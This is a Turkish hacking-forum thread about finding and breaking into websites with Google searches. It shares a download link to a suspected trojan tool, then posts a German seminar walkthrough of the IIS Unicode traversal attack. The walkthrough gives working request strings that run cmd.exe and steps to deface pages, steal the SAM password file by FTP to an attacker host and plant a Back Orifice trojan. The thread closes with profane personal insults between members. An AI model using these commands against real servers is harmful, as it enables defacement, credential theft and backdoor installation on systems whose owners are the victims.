Google La Site Hacklemek
-
Arkadaşlar demin buldum. Kasper le tarattım hack tool olarak görüyor trojan felan yok sanırım.
Your Download-Link #1: http://rapidshare.de/files/32885631/GoogleHack_V1.0.rar.html
Program işte google site hacklemenize yarıyor örnek demin bulduğu sitelerden biri. Ama program içinde google nasıl hackleyeceğinizin tüm kombinasyonları var.
İskopiççe bir yöntem. Çalışıyor bayağı ama bi yer hacklemedim sadece nasıl bişey onu merak ettim
bunun gibi şeyler buluyor felan ..
http://troitsk.org/sites/falco/Sites.dat -
yok hocam nod32 trojan diyosa trojandır,güveniyom ben ona :D
-
ulan ben açtım umarım yememişimdir trojan felan ama bişey yapmadı bana :S
-
afiyet olsun DrKill:D:D:D
-
hoca inanmayın böyle şeylere ya googleyle nasıl site hackleyeceksiniz olsa olsa davs gibi bişeydir işte bana ne yararı dokuncak isko götvereninden ne farkım olacak..
-
IIS 5.0 4.0 ve hatta 6.0 da işleyen scriptleri vericem bunuda google kullanarak yapıyosunuz aramaya C:inetpub\wwwroot veya başka nerelere kurulabilir cinsinden yazılıp çıkan sonuçları kullanabilirsiniz bizim okulun güvenlik seminerinden alıntı almanca yazılar var siktirin edin kodun ne işe yaradığını anlarsınız zaten
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir+c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir+c:\
/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir+c:\
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
CMD.EXE Kopieren:
http://test2/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+cmd1.exe
Jetzt ist es möglich:
http://test2/scripts/cmd1.exe?/c+dir+c:\
Einfaches DEFACING:
http://test2/scripts/cmd1.exe?/c+echo%20Ich%20bin%20ein%20Opfer%20geworden!!!%20Meine%20Startseite%20ist%20geändert...>c:\inetpub\wwwroot\index.htm
http://test2
DEFACING: erstellen einer neuen HTML Seite
1. ftp.scr Datei wird auf dem IIS Rechner erstellt.
http://test2/scripts/cmd1.exe?/c+echo+open+hacker.com>ftp.scr
http://test2/scripts/cmd1.exe?/c+echo+user+anonymous>>ftp.scr
http://test2/scripts/cmd1.exe?/c+echo+nobody@hacker.com>>ftp.scr
http://test2/scripts/cmd1.exe?/c+echo+get+deface.htm+deface.htm>>ftp.scr
2. FTP Client auf IIS Server wird gestartet:
http://test2/scripts/cmd1.exe?/c+ftp+-s:ftp.scr+-n+-d
3. Kopieren der Deface.htm nach wwwroot und ersetzen der alten index.htm
http://test2/scripts/cmd1.exe?/c+copy+c:\inetpub\scripts\deface.htm+c:\inetpub\wwwroot\index.htm
Passwort-Datei stehlen
1. Passwort Datei kopieren auf dem IIS Server
http://test2/scripts/cmd1.exe?/c+copy+c:\winnt\repair\sam._+passwort.sam
2. ftp.scr Datei erstellen auf dem IIS Server
http://test2/scripts/cmd1.exe?/c+echo+open+hacker.com>ftp2.scr
http://test2/scripts/cmd1.exe?/c+echo+user+anonymous>>ftp2.scr
http://test2/scripts/cmd1.exe?/c+echo+nobody@hacker.com>>ftp2.scr
http://test2/scripts/cmd1.exe?/c+echo+put+passwort.sam+passwort.sam>>ftp2.scr
Start
http://test2/scripts/cmd1.exe?/c+ftp+-s:ftp2.scr+-n+-d
Datei passwort.sm wird auf den Angreifer Rechner nach C:\srtFtpData\hacker.com übertragen
Lophtcrack kann nun genutzt werden
Trojaner aufspielen:
1. Serverdatei vom Angreiferrechner auf den IIS Server spielen
http://test2/scripts/cmd1.exe?/c+echo+open+hacker.com>ftp3.scr
http://test2/scripts/cmd1.exe?/c+echo+user+anonymous>>ftp3.scr
http://test2/scripts/cmd1.exe?/c+echo+nobody@hacker.com>>ftp3.scr
http://test2/scripts/cmd1.exe?/c+echo+get+boxp.exe>>ftp3.scr
2. Datei ausführen und vom Angreifer auf den IIS Server kopieren
http://test2/scripts/cmd1.exe?/c+ftp+-s:ftp3.scr+-n+-d
3. Starten des Backorifice-Clients auf dem IIS Rechner
http://test2/scripts/cmd1.exe?/c+boxp.exe
-
isko dedinde anılarım depreşti :) bizim sınıftada var bi tane isko dioz onada :P
-
manuel olarak yapabilirsin bu işi ayrıca unicode tarihi eser bi durum
bu programların çoğunluğu trojan vs.. gibi şeyler oluşturur
saygılar -
http://johnny.ihackstuff.com/
Bu konuda 1 Numaradır.
Herkes caktırmadan lamer yetıstıremez, saygı duymak lazım : ) -
aaaaa bunu yazdı:
-----------------------------
bakalım bu siteye indexi yeyince o zaman iskorpiç diceniz kendi aranızda ulen götlek çekemiyonuzmu sitenizin a.q haberiniz olsun götlek herif
-----------------------------abi sen böle bok bok konusuosun ama tbt her fırsatta müridiyle adminiyle amına komuo mu iskonun :) tbtnin el yapımı backup sistemi devreye girip birkaç dakikalığına db hatası verdiğinde buna "tahribatı hackledim!!!" diyerek screen shot alan ben miyim yoksa isko mu :) kaptan iskoyu arayıp taşak oynadığında tarikate küfreden ben miyim isko mu :) Holynin decanın renenin vb insanların yüceltmeye çalıştıı hack ve webmaster alemini davslarla kişisel sitesine phpbb kurmalarla bilmem nelerle amkoyan ben miyim isko mu. bi de ne yaptı diosun ya. sktr git sen iskonun dötünü yala hoca, burası bizim mekanımız ;) bu arada belirtmek isterim ki iskorpiç tbtde yetkili birilerini ayartmadığı sürece (imkansıza yakın artık) salak saçma vaadlerle (cem uzan stili vaadlerle) asla bu siteye index neyim atamaz bu zekayla kabiliyetle :)
-
AgiL3 bunu yazdı:
-----------------------------aaaaa bunu yazdı:
-----------------------------
bakalım bu siteye indexi yeyince o zaman iskorpiç diceniz kendi aranızda ulen götlek çekemiyonuzmu sitenizin a.q haberiniz olsun götlek herif
-----------------------------abi sen böle bok bok konusuosun ama tbt her fırsatta müridiyle adminiyle amına komuo mu iskonun :) tbtnin el yapımı backup sistemi devreye girip birkaç dakikalığına db hatası verdiğinde buna "tahribatı hackledim!!!" diyerek screen shot alan ben miyim yoksa isko mu :) kaptan iskoyu arayıp taşak oynadığında tarikate küfreden ben miyim isko mu :) Holynin decanın renenin vb insanların yüceltmeye çalıştıı hack ve webmaster alemini davslarla kişisel sitesine phpbb kurmalarla bilmem nelerle amkoyan ben miyim isko mu. bi de ne yaptı diosun ya. sktr git sen iskonun dötünü yala hoca, burası bizim mekanımız ;) bu arada belirtmek isterim ki iskorpiç tbtde yetkili birilerini ayartmadığı sürece (imkansıza yakın artık) salak saçma vaadlerle (cem uzan stili vaadlerle) asla bu siteye index neyim atamaz bu zekayla kabiliyetle :)
-----------------------------AgiL3 gereken cevabı vermiş valla =)